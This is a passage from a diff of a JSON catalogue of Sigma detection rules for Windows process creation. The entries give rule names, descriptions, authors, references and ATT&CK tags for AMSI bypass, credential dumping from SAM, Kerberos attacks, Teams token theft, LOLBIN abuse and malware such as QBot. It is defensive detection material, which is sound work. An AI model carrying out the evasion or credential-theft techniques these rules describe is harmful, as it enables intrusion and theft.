"https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", + "value": "Office Applications Spawning Wmi Cli" + }, + { + "description": "Detects file execution using the msdeploy.exe lolbin", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_msdeploy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/995837734379032576", + "https://twitter.com/pabraeken/status/999090532839313408", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "value": "Execute Files with Msdeploy.exe" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "value": "Suspicious Command With Teams Objects Pathes" + }, + { + "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_amsi_bypass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/735261176745988096", + "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "value": "Tamper Windows Defender Remove-MpPreference" + "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "value": "Powershell AMSI Bypass via .NET Reflection" }, { - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", "meta": { - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "creation_date": "2018/09/03", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" ], - "filename": "proc_creation_win_tap_installer_execution.yml", + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "value": "Suspicious Encoded PowerShell Command Line" + }, + { + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dll_sideload_defender.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "value": "DLL Sideloading by Microsoft Defender" + }, + { + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_pypykatz.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "value": "Registry Parse with Pypykatz" + }, + { + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/06", + "falsepositive": [ + "Legitimate use of the UI Accessibility Checker" + ], + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", + "value": "Suspicious LOLBIN AccCheckConsole" + }, + { + "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/09/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ldifde_file_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", + "https://twitter.com/0gtweet/status/1564968845726580736", + "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "value": "Suspicious Ldifde Command Usage" + }, + { + "description": "Detects a suspicious child process of a Windows shell", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2018/04/06", + "falsepositive": [ + "Administrative scripts", + "Microsoft SCCM" + ], + "filename": "proc_creation_win_shell_spawn_susp_program.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" + ] + }, + "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "value": "Windows Shell Spawning Suspicious Program" + }, + { + "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)", + "creation_date": "2020/10/13", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "value": "Accesschk Usage To Check Privileges" + }, + { + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_lolbin_ttdinject.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "value": "Use of TTDInject.exe" + }, + { + "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_appvlp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "value": "Using AppVLP To Circumvent ASR File Path Rule" + }, + { + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "meta": { + "author": "Ilya Krestinichev", + "creation_date": "2022/11/03", + "falsepositive": [ + "False positive could occur in admin scripts that execute inline" + ], + "filename": "proc_creation_win_susp_ping_del.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", + "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "value": "Suspicious Ping And Del Combination" + }, + { + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/11", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "value": "Suspicious Scheduled Task Creation Involving Temp Folder" + }, + { + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remote_desktop_tunneling.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ] + }, + "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "value": "Potential Remote Desktop Tunneling" + }, + { + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/09", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_msiexec_web_install.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "value": "MsiExec Web Install" + }, + { + "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", + "meta": { + "author": "blueteamer8699", + "creation_date": "2022/01/03", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" + ] + }, + "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "value": "GatherNetworkInfo.vbs Script Usage" + }, + { + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "value": "LOLBIN Execution Of The FTP.EXE Binary" + }, + { + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "value": "Exploiting CVE-2019-1388" + }, + { + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "value": "Always Install Elevated MSI Spawned Cmd And Powershell" + }, + { + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/04", + "falsepositive": [ + "Command lines that use the same flags" + ], + "filename": "proc_creation_win_proc_dump_createdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "value": "CreateDump Process Dump" + }, + { + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "meta": { + "author": "Nasreddine Bencherchali, Tim Shelton", + "creation_date": "2022/08/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_reg_delete_safeboot.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "value": "Delete SafeBoot Keys Via Reg Utility" + }, + { + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/29", + "falsepositive": [ + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "filename": "proc_creation_win_susp_powershell_sam_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/splinter_code/status/1420546784250769408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "1af57a4b-460a-4738-9034-db68b880c665", + "value": "PowerShell SAM Copy" + }, + { + "description": "Detects SILENTTRINITY stager use", + "meta": { + "author": "Aleksey Potapov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_silenttrinity_stage_use.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", + "value": "SILENTTRINITY Stager Execution" + }, + { + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_rubeus.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", + "https://github.com/GhostPack/Rubeus", + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "value": "Rubeus Hack Tool" + }, + { + "description": "Detects QBot like process executions", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_qbot.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/killamjr/status/1179034907932315648", + "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "value": "QBot Process Creation" + }, + { + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_printbrm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "value": "PrintBrm ZIP Creation of Extraction" + }, + { + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "meta": { + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." + ], + "filename": "proc_creation_win_susp_net_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", + "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", + "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" + ] + }, + "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "value": "Net.exe Execution" + }, + { + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "filename": "proc_creation_win_shadow_copies_access_symlink.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" + ] + }, + "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "value": "Shadow Copies Access via Symlink" + }, + { + "description": "Detects process creation with a renamed Msdt.exe", + "meta": { + "author": "pH-T", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_msdt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "value": "Renamed Msdt.exe" + }, + { + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", + "value": "Hermetic Wiper TG Process Patterns" + }, + { + "description": "Detects the use of NSudo tool for command execution", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nsudo_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://nsudo.m2team.org/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", + "value": "NSudo Tool Execution" + }, + { + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_utilityfunctions.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", + "value": "UtilityFunctions.ps1 Proxy Dll" + }, + { + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + ], + "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + 